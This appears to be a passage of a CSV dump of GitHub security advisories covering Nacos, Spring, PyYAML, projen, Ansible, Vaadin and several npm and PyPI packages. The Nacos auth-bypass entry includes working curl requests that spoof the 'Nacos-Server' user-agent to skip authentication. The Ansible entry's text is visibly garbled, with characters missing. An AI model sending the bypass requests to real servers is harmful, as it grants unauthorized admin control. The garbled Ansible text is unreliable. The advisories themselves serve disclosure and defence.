+These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql)",[],"[{'package': {'ecosystem': 'Maven', 'name': 'com.alibaba.nacos:nacos-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29442'}, {'type': 'WEB', 'url': 'https://github.com/alibaba/nacos/issues/4463'}, {'type': 'WEB', 'url': 'https://github.com/alibaba/nacos/pull/4517'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-36hp-jr8h-556f'}]","{'cwe_ids': ['CWE-306'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-27T20:08:49Z', 'nvd_published_at': '2021-04-27T21:15:00Z'}"
+1.4.0,GHSA-rv39-3qh7-9v7w,2022-02-08T22:03:58Z,2021-04-30T17:29:51Z,,['CVE-2020-5421'],Improper Input Validation in Spring Framework,"In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework:spring-framework-bom'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2.0'}, {'fixed': '5.2.9'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.8'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework:spring-framework-bom'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1.0'}, {'fixed': '5.1.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.1.17'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework:spring-framework-bom'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.19'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.0.18'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework:spring-framework-bom'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.29'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5421'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1c679c43fa4f7846d748a937955c7921436d1b315445978254442163@%3Ccommits.ambari.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1eccdbd7986618a7319ee7a533bd9d9bf6e8678e59dd4cca9b5b2d7a@%3Cissues.ambari.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3589ed0d18edeb79028615080d5a0e8878856436bb91774a3196d9eb@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r503e64b43a57fd68229cac4a869d1a9a2eac9e75f8719cad3a840211@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5c95eff679dfc642e9e4ab5ac6d202248a59cb1e9457cfbe8b729ac5@%3Cissues.ambari.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7e6a213eea7f04fc6d9e3bd6eb8d68c4df92a22e956e95cb2c482865@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8b496b1743d128e6861ee0ed3c3c48cc56c505b38f84fa5baf7ae33a@%3Cdev.ambari.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r918caad55dcc640a16753b00d8d6acb90b4e36de4b6156d0867246ec@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9f13cccb214495e14648d2c9b8f2c6072fd5219e74502dd35ede81e1@%3Cdev.ambari.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra889d95141059c6cbe77dd80249bb488ae53b274b5f3abad09d9511d@%3Cuser.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raf7ca57033e537e4f9d7df7f192fa6968c1e49409b2348e08d807ccb@%3Cuser.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb18ed999153ef0f0cb7af03efe0046c42c7242fd77fbd884a75ecfdc@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc9efaf6db98bee19db1bc911d0fa442287dac5cb229d4aaa08b6a13d@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd462a8b0dfab4c15e67c0672cd3c211ecd0e4f018f824082ed54f665@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re014a49d77f038ba70e5e9934d400af6653e8c9ac110d32b1254127e@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf00d8f4101a1c1ea4de6ea1e09ddf7472cfd306745c90d6da87ae074@%3Cdev.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210513-0009/'}, {'type': 'WEB', 'url': 'https://tanzu.vmware.com/security/cve-2020-5421'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-35'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-27T21:06:49Z', 'nvd_published_at': '2020-09-19T04:15:00Z'}"
+1.4.0,GHSA-36hp-jr8h-556f,2021-05-10T14:56:08Z,2021-04-27T20:09:17Z,,['CVE-2021-29441'],Authentication Bypass,"When configured to use authentication (`-Dnacos.core.auth.enabled=true`) Nacos uses the `AuthFilter` servlet filter to enforce authentication. This filter has a [backdoor](https://github.com/alibaba/nacos/blob/5fa05aef52f7432aeab19fe53035431b9d8c91d9/core/src/main/java/com/alibaba/nacos/core/auth/AuthFilter.java#L78-L81) that enables Nacos servers to bypass this filter and therefore skip authentication checks. This mechanism relies on the `user-agent` HTTP header so it can be easily spoofed.
+
+The following request to the `configuration` endpoint gets rejected as we are not providing any credentials:
+```
+❯ curl -X POST ""http://127.0.0.1:8848/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld""
+{""timestamp"":""2020-12-02T14:33:57.154+0000"",""status"":403,""error"":""Forbidden"",""message"":""unknown user!"",""path"":""/nacos/v1/cs/configs""}
+```
+
+However the following one gets accepted by using the `Nacos-Server` user-agent header:
+```
+❯ curl -X POST -A Nacos-Server ""http://127.0.0.1:8848/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld""
+true
+```
+
+#### Impact
+
+This issue may allow any user to carry out any administrative tasks on the Nacos server.",[],"[{'package': {'ecosystem': 'Maven', 'name': 'com.alibaba.nacos:nacos-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29441'}, {'type': 'WEB', 'url': 'https://github.com/alibaba/nacos/issues/4701'}, {'type': 'WEB', 'url': 'https://github.com/alibaba/nacos/pull/4703'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-36hp-jr8h-556f'}]","{'cwe_ids': ['CWE-290'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-27T20:08:38Z', 'nvd_published_at': '2021-04-27T21:15:00Z'}"
+1.4.0,GHSA-3pqx-4fqf-j49f,2022-01-04T19:49:51Z,2021-04-20T16:40:42Z,,['CVE-2019-20477'],Deserialization of Untrusted Data in PyYAML,"PyYAML 5.1 through 5.1.2 has insufficient restrictions on the load and load_all functions because of a class deserialization issue, e.g., Popen is a class in the subprocess module. NOTE: this issue exists because of an incomplete fix for CVE-2017-18342.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pyyaml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.1'}, {'fixed': '5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-20477'}, {'type': 'PACKAGE', 'url': 'https://github.com/yaml/pyyaml'}, {'type': 'WEB', 'url': 'https://github.com/yaml/pyyaml/blob/master/CHANGES'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/33VBUY73AA6CTTYL3LRWHNFDULV7PFPN/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/52N5XS73Z5S4ZN7I7R56ICCPCTKCUV4H/'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/download/47655'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T19:24:04Z', 'nvd_published_at': '2020-02-19T04:15:00Z'}"
+1.4.0,GHSA-gg2g-m5wc-vccq,2021-04-16T22:53:30Z,2021-04-06T18:36:40Z,,['CVE-2021-21423'],Rebuild-bot workflow may allow unauthorised repository modifications,"### Impact
+
+`projen` is a project generation tool that synthesizes project configuration files such as `package.json`, `tsconfig.json`, `.gitignore`, GitHub Workflows, `eslint`, `jest`, and more, from a well-typed definition written in JavaScript. Users of projen's `NodeProject` project type (including any project type derived from it) include a `.github/workflows/rebuild-bot.yml` workflow that may allow any GitHub user to trigger execution of un-trusted code in the context of the ""main"" repository (as opposed to that of a fork). In some situations, such untrusted code may potentially be able to commit to the ""main"" repository.
+
+The rebuild-bot workflow is triggered by comments including `@projen rebuild` on pull-request to trigger a re-build of the projen project, and updating the pull request with the updated files. This workflow is triggered by an `issue_comment` event, and thus always executes with a `GITHUB_TOKEN` belonging to the repository into which the pull-request is made (this is in contrast with workflows triggered by `pull_request` events, which always execute with a `GITHUB_TOKEN` belonging to the repository from which the pull-request is made).
+
+Repositories that do not have branch protection configured on their default branch (typically `main` or `master`) could possibly allow an untrusted user to gain access to secrets configured on the repository (such as NPM tokens, etc). Branch protection prohibits this escalation, as the managed `GITHUB_TOKEN` would not be able to modify the contents of a protected branch and affected workflows must be defined on the default branch.
+
+### Patches
+
+The issue was mitigated in version `0.16.41` of the `projen` tool, which removes the `issue_comment` trigger from this workflow. Version `0.17.0` of projen completely removes the `rebuild-bot.yml` workflow.
+
+### Workarounds
+
+The recommended way to address the vulnerability is to upgrade `projen`. Users who cannot upgrade `projen` may also remove the `.github/workflows/rebuild-bot.yml` file and add it to their `.gitignore` file (via `projenrc.js`) to mitigate the issue.
+
+### References
+
+The `rebuild-bot.yml` workflow managed by `projen` is only one occurrence of a GitHub Workflows mis-configuration, but it may also be present in other workflows not managed by `projen` (either hand-written, or managed by other tools). For more information on this class of issues, the [Keeping your GitHub Actions and workflows secure: Preventing pwn requests][1] article provides a great overview of the problem.
+
+
+[1]: https://securitylab.github.com/research/github-actions-preventing-pwn-requests","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'projen'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.6.0'}, {'fixed': '0.16.41'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/projen/projen/security/advisories/GHSA-gg2g-m5wc-vccq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21423'}, {'type': 'WEB', 'url': 'https://github.com/projen/projen/commit/36030c6a4b1acd0054673322612e7c70e9446643'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/projen'}]","{'cwe_ids': ['CWE-527'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T18:36:19Z', 'nvd_published_at': '2021-04-06T19:15:00Z'}"
+1.4.0,GHSA-77g3-3j5w-64w4,2021-08-31T21:10:36Z,2021-04-07T20:36:46Z,,['CVE-2020-10685'],Exposure of Resource to Wrong Sphere and Insecure Temporary File in Ansible,"A flaw was found in Ansible Engine affecting Ansible Engine versions 2.7.x before 2.7.17 and 2.8.x before 2.8.11 and 2.9.x before 2.9.7 as well as Ansible Tower before and including versions 3.4.5 and 3.5.5 and 3.6.3 when using modules which decrypts vault files such as assemble, script, unarchive, win_copy, aws_s3 or copy modules. The temporary directory is created in /tmp leaves the s ts unencrypted. On Operating Systems which /tmp is not a tmpfs but part of the root partition, the directory is only cleared on boot and the decryp emains when the host is switched off. The system will be vulnerable when the system is not running. So decrypted data must be cleared as soon as possible and the data which normally is encrypted ble.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.17'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.11'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10685'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/68433'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10685'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202006-11'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4950'}]","{'cwe_ids': ['CWE-377', 'CWE-459', 'CWE-668'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T14:11:30Z', 'nvd_published_at': '2020-05-11T14:15:00Z'}"
+1.4.0,GHSA-7fjp-g4m7-fx23,2021-04-12T20:05:57Z,2021-04-13T15:12:26Z,,[],User (Encrypted) Password Field Being Serialised,"### Impact
+Leaking Password field during serialisation of the User model. Password is in the encrypted form but if User model is requested in json or array form the value is printed.
+
+### Patches
+Issue has been patched in version 0.3.7-beta and onwards.
+
+### Workarounds
+Add the 'password' field to the Users model file in the hidden array:
+
+```php
+
+ /**
+ * The attributes that should be hidden for arrays.
+ *
+ * @var array
+ */
+ protected $hidden = [
+ 'remember_token',
+ 'password',
+ ];
+```
+
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [pwweb/laravel-core](https://github.com/pwweb/laravel-core)
+* Email us at [security@pw-websolutions.com](mailto:security@pw-websolutions.com)",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'pwweb/laravel-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.7-beta'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.3.6-beta'}}]","[{'type': 'WEB', 'url': 'https://github.com/pwweb/laravel-core/security/advisories/GHSA-7fjp-g4m7-fx23'}]","{'cwe_ids': ['CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-12T20:05:57Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f7vx-j8mp-3h2x,2021-03-29T22:11:05Z,2021-04-13T15:18:01Z,,['CVE-2019-17636'],Insufficient Verification of Data Authenticity in Eclipse Theia,"In Eclipse Theia versions 0.3.9 through 0.15.0, one of the default pre-packaged Theia extensions is ""Mini-Browser"", published as ""@theia/mini-browser"" on npmjs.com. This extension, for its own needs, exposes a HTTP endpoint that allows to read the content of files on the hosts filesystem, given their path, without restrictions on the requesters origin. This design is vulnerable to being exploited remotely through a DNS rebinding attack or a drive-by download of a carefully crafted exploit.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@theia/mini-browser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.9'}, {'fixed': '0.16.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-17636'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-theia/theia/pull/7205'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-theia/theia/commit/b212d07f915df1509180944ee3132714bc2636bf'}, {'type': 'WEB', 'url': 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=551747'}]","{'cwe_ids': ['CWE-345'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T22:11:05Z', 'nvd_published_at': '2020-03-10T15:15:00Z'}"
+1.4.0,GHSA-45w5-pvr8-4rh5,2021-03-26T22:09:16Z,2021-04-13T15:19:14Z,,['CVE-2021-26275'],Command injection in eslint-fixer,The eslint-fixer package through 0.1.5 for Node.js allows command injection via shell metacharacters to the fix function. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. The ozum/eslint-fixer GitHub repository has been intentionally deleted.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'eslint-fixer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26275'}, {'type': 'WEB', 'url': 'https://advisory.checkmarx.net/advisory/CX-2021-4774'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/eslint-fixer'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-26T22:09:16Z', 'nvd_published_at': '2021-03-19T00:15:00Z'}"
+1.4.0,GHSA-rmp7-f2vp-3rq4,2023-08-30T22:09:23Z,2021-04-20T16:31:54Z,,['CVE-2021-25925'],Cross-site scripting in SiCKRAGE,"in SiCKRAGE, versions 4.2.0 to 10.0.11.dev1 are vulnerable to Stored Cross-Site-Scripting (XSS) due to user input not being validated properly when processed by the server. Therefore, an attacker can inject arbitrary JavaScript code inside the application, and possibly steal a user’s sensitive information.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'sickrage'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '10.0.11.dev2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.0.11.dev1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25925'}, {'type': 'WEB', 'url': 'https://github.com/SiCKRAGE/SiCKRAGE/commit/9f42426727e16609ad3d1337f6637588b8ed28e4'}, {'type': 'PACKAGE', 'url': 'https://github.com/SiCKRAGE/SiCKRAGE'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25925'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-13T20:56:03Z', 'nvd_published_at': '2021-04-12T14:15:00Z'}"
+1.4.0,GHSA-43ch-2h55-2vj7,2021-03-29T21:49:55Z,2021-04-13T15:18:17Z,,['CVE-2020-28360'],Server-Side Request Forgery in private-ip,"Insufficient RegEx in private-ip npm package v1.0.5 and below insufficiently filters reserved IP ranges resulting in indeterminate SSRF. An attacker can perform a large range of requests to ARIN reserved IP ranges, resulting in an indeterminable number of critical attack vectors, allowing remote attackers to request server-side resources or potentially execute arbitrary code through various SSRF techniques.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'private-ip'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28360'}, {'type': 'WEB', 'url': 'https://github.com/frenchbread/private-ip/commit/840664c4b9ba7888c41cfee9666e9a593db133e9'}, {'type': 'WEB', 'url': 'https://github.com/frenchbread/private-ip'}, {'type': 'WEB', 'url': 'https://johnjhacking.com/blog/cve-2020-28360/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/private-ip'}]","{'cwe_ids': ['CWE-918'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T21:49:55Z', 'nvd_published_at': '2020-11-23T21:15:00Z'}"
+1.4.0,GHSA-h73g-8g27-xxcx,2021-04-08T21:59:12Z,2021-04-13T15:22:58Z,,['CVE-2020-28439'],Command injection in corenlp-js-prefab,This affects all versions of package corenlp-js-prefab. The injection point is located in line 10 in 'index.js.' It depends on a vulnerable package 'corenlp-js-interface.',"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'corenlp-js-prefab'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28439'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CORENLPJSPREFAB-1050434'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T21:59:12Z', 'nvd_published_at': '2020-12-11T17:15:00Z'}"
+1.4.0,GHSA-836c-xg97-8p4h,2023-08-07T13:07:47Z,2021-04-30T17:34:48Z,,['CVE-2020-27197'],libtaxii Server-Side Request Forgery vulnerability,"""TAXII libtaxii through 1.1.117, as used in EclecticIQ OpenTAXII through 0.2.0 and other products, allows SSRF via an initial http:// substring to the parse method, even when the no_network setting is used for the XML parser. NOTE: the vendor points out that the parse method ""wraps the lxml library"" and that this may be an issue to ""raise ... to the lxml group.""""","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'libtaxii'}, 'ecosystem_specific': {'affected_functions': ['libtaxii.common.parse']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.118'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-27197'}, {'type': 'WEB', 'url': 'https://github.com/TAXIIProject/libtaxii/issues/246'}, {'type': 'WEB', 'url': 'https://github.com/eclecticiq/OpenTAXII/issues/176'}, {'type': 'WEB', 'url': 'https://github.com/TAXIIProject/libtaxii/pull/247'}, {'type': 'WEB', 'url': 'https://github.com/TAXIIProject/libtaxii/commit/23c6f7b69d99e965c8d53dc4710ae64da3fb4842'}, {'type': 'PACKAGE', 'url': 'https://github.com/TAXIIProject/libtaxii'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/159662/Libtaxii-1.1.117-OpenTaxi-0.2.0-Server-Side-Request-Forgery.html'}]","{'cwe_ids': ['CWE-918'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T17:53:43Z', 'nvd_published_at': '2020-10-17T20:15:00Z'}"
+1.4.0,GHSA-qfxv-qqvg-24pg,2021-03-29T22:57:19Z,2021-04-13T15:17:36Z,,['CVE-2019-10788'],OS Command Injection in im-metadata,"im-metadata through 3.0.1 allows remote attackers to execute arbitrary commands via the ""exec"" argument. It is possible to inject arbitrary commands as part of the metadata options which is given to the ""exec"" function.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'im-metadata'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10788'}, {'type': 'WEB', 'url': 'https://github.com/Turistforeningen/node-im-metadata/commit/ea15dddbe0f65694bfde36b78dd488e90f246639'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-IMMETADATA-544184'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T22:57:19Z', 'nvd_published_at': '2020-02-04T21:15:00Z'}"
+1.4.0,GHSA-vwfx-hh3w-fj99,2021-03-31T17:35:42Z,2021-04-06T17:24:14Z,,['CVE-2021-21418'],Potential XSS injection in the newsletter conditions field,"### Impact
+An employee can inject javascript in the newsletter condition field that will then be executed on the front office
+
+### Patches
+The issue has been fixed in 2.6.1","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/ps_emailsubscription'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/ps_emailsubscription/security/advisories/GHSA-vwfx-hh3w-fj99'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21418'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/ps_emailsubscription/commit/664ffb225e2afb4a32640bbedad667dc6e660b70'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/ps_emailsubscription/releases/tag/v2.6.1'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/prestashop/ps_emailsubscription'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T17:35:42Z', 'nvd_published_at': '2021-03-31T18:15:00Z'}"
+1.4.0,GHSA-75xc-qvxh-27f8,2021-04-16T23:15:02Z,2021-04-19T14:51:06Z,,['CVE-2021-31403'],Timing side channel vulnerability in UIDL request handler in Vaadin 7 and 8,"Non-constant-time comparison of CSRF tokens in UIDL request handler in `com.vaadin:vaadin-server` versions 7.0.0 through 7.7.23 (Vaadin 7.0.0 through 7.7.23), and 8.0.0 through 8.12.2 (Vaadin 8.0.0 through 8.12.2) allows attacker to guess a security token via timing attack
+
+- https://vaadin.com/security/cve-2021-31403","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.7.24'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.12.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.7.24'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.12.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/framework/security/advisories/GHSA-75xc-qvxh-27f8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31403'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/framework/pull/12188'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/framework/pull/12190'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31403'}]","{'cwe_ids': ['CWE-203', 'CWE-208'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:15:02Z', 'nvd_published_at': '2021-04-23T16:15:00Z'}"
